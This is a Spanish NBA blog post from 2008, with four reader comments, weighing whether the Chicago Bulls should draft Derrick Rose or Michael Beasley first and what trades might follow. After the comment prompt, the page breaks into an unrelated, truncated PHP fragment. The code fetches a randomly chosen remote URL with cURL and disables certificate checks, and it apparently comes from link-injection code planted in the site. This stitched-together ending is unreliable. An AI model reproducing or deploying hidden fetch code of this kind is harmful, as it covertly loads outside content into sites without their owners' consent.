La difícil elección de Chicago

05 de June de 2008 por txusma

Quedan tan solo 20 días para que se lleve a cabo el draft de la NBA e, inmersos en unos apasionantes playoffs, hemos olvidado un poco este importantísimo y mediático acontecimiento. Eso si, hace unos días ya os explicamos con todo lujo de detalles que el número 1 había caído en Chicago a pesar de las pocas posibilidades que tenían de obtenerlo y que ya estaba claro que a este número 1 tan sólo podían aspirar 2 jugadores: Michael Beasley y Derrick Rose.

Chicago, y por extensión todas las personas que jueguen ligas fantásticas y también tengan que elegir en el draft, se encuentra ahora mismo en la tesitura de escoger entre 2 auténticos fuera de serie, futuros All-Stars en todas las predicciones que se pueden leer por la red. Cualquiera de los 2 jugadores le vendría de perlas a la franquicia de IIllinois: Beasley es un PF fuerte, rápido, con un gran repertorio ofensivo que incluye desde movimientos de espaldas a la canastas perfectos hasta tiros de 3 tras contrataque con un más que importante acierto. Está claro que en Chicago hace falta este tipo de jugador como el comer, de hecho hay rumores que sitúan a Elton Brand en su órbita, y Beasley complementaría a los Deng, Gordon, Hinrich, Thomas, Noah, etc… perfectamente. Derrick Rose, natural de Chicago, es una base alto también muy rápido y atlético y con una excelente visión de juego. Además va muy bien al rebote por lo que todo el mundo presupone que será capaz de lograr unas estadísticas completísimas, de ahí su comparación con Jason Kidd. Su elección seguramente acarrearía la no renovacion (o sign&trade) de Ben Gordon o el traspaso de Hinrich, jugadores con los que podría conseguir ese anotador interior que les hace tanta falta. Cualquiera puede ver que la elección no es sencilla.

Vista la dificultad de la elección Chicago no ha descartado el traspasar ese número 1 y de hecho han aparecido rumores en este sentido. Uno de ellos, el más espectacular, colocaba a Dwyane Wade y la elección de Miami (que es la 2) a cambio de ese número 1 y varios jugadores. De todas maneras este rumor ha sido completamente descartado por la franquicia de Florida.

La mayoría de mocks colocan finalmente a Derrick Rose como número 1 lo que seguramente, como indicábamos antes, traerá como consecuencia el traspaso de Hinrich o Gordon. No es descartable que alguno de estos jugadores entren en un hipotético traspaso a cambio de Elton Brand (aunque debido a que dispone de una PlayerOption, podría fichar como agente libre) y conformar un equipo de auténtico ensueño con Rose, Hughes, Deng, Brand, Noah como quinteto titular y Hinrich/Gordon, Nocioni, Tyrus, Gooden, Gray, Sefolosha en el banco. A priori un equipo que podría disputar el trono del Este en poder, actualmente, de los Boston Celtics.

Comenta

4 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    De ensueño para ti, Txus (léase)

      Citar

  2. txusma dice:
    #2

    De ensueño para todo buen aficionado al baloncesto 😉

      Citar

  3. TheDeerHunter dice:
    #3

    Sí, vamos… de Rose no sé, pero Hughes y Noah… uf!!! el dream team se queda corto!!!

    (cuanto mal ha hecho lo de las vacas locas…)

      Citar

  4. Viva_Dirk dice:
    #4

    Si los Bulls fichan a Elton Brand como agente libres y eligen a Rose en el draft, lo normal es que Hinrich y Gordon salgan en un trade, ya que a dia de hoy Gordon sigue pidiendo el máximo y los Bulls no están dispuestos a darselo. Si pasa esto, existen 2 posibilidades:

    – Ir a por un escolta de modo que Hughes ocupe el puesto de 6º hombre para cubrir tanto minutos de escolta como de base. Los escoltas que podrian llegar viendo su situación en sus respectivas franquicias son Kevin Martin, Michael Redd o Jason Richardson, el resto de posibilidades serían mas bien aleros, Josh Howard o T-Mac, este sería lo ideal para un equipo como Chicago y en Houston perfectamente podrian pensar en empezar algo con Hinrich-Gordon-Yao, viendo que no han conseguido nada con McGrady y sus problemas físicos.

    – Ir a por un pivot, el primer nombre que se me viene a la cabeza es Jermaine O’Neal, que formaría una tremenda pareja con Elton Brand, y dejaría a Gooden, Noah y Tyrus a la espera de minutos. Otras opciones podrian ser Brad Miller o Marcus Camby, estos 2 últimos simplemente con Hinrich de por medio podrian llegar a la ciudad del viento.

    Resumiendo, a mi no me parece una decisión dificil sino todo lo contrario. Ambos jugadores pueden cuadrar en las necesidades de los Bulls, pero lo importante es que el resto de operación las hagan coherentemente con la elección, que no hagan tonterías como coger a Rose, mantener a Hinrich y no reforzar la posición de 4.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>